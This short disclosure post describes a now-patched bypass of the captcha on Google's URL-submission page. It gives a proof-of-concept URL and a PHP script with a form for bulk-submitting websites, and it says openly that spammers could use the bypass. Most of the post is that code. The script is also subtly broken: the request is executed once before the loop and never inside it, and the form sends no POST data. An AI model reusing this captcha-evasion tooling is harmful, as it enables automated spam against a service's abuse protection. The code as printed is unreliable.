This Captcha bypass allow to spammer to submit number (that May be more than
1000 Website) of websites to Google crawl by writing simple program in any
programming language.
Original link (With captcha):
www.google.com/addurl/?continue=/addurl
Bypass captcha link POC: http://www.google.com/addurl?q=www.mysite.com&hl=&dqq=
If you execute the above URL in the browser
then it will add the new website to Google crawl database.
Following Program can be used to submit a large amount of website at a time.
PHP Code
<?php
@if(isset($_POST)){
$part1 = "http://www.google.com/addurl?q=";
$part2 = "&hl=&dqq=";
$curl = curl_init("http://google.com");
curl_exec($curl);
$urls=$_POST["urls"];
$lines=explode("\n",$urls);
foreach($lines as $line)
{
$new = str_replace(" ", "", $part1.$line.$part2);
curl_setopt($curl,CURLOPT_URL,$new);
}}
echo "done.";
?>
<html>
<head>
<title>Google Add Urls</title>
</head>
<body>
<form>
<textarea name="urls" cols="20" rows="100"></textarea><br />
<input type="submit" value="add urls" />
</form>
</body>
</html>
This may be small Vulnerability but still we want google to most secure! So
please try to fix. Otherwise there will be no use of captcha .
Now Google Patched This vuln :)
/peace
Sandeep k.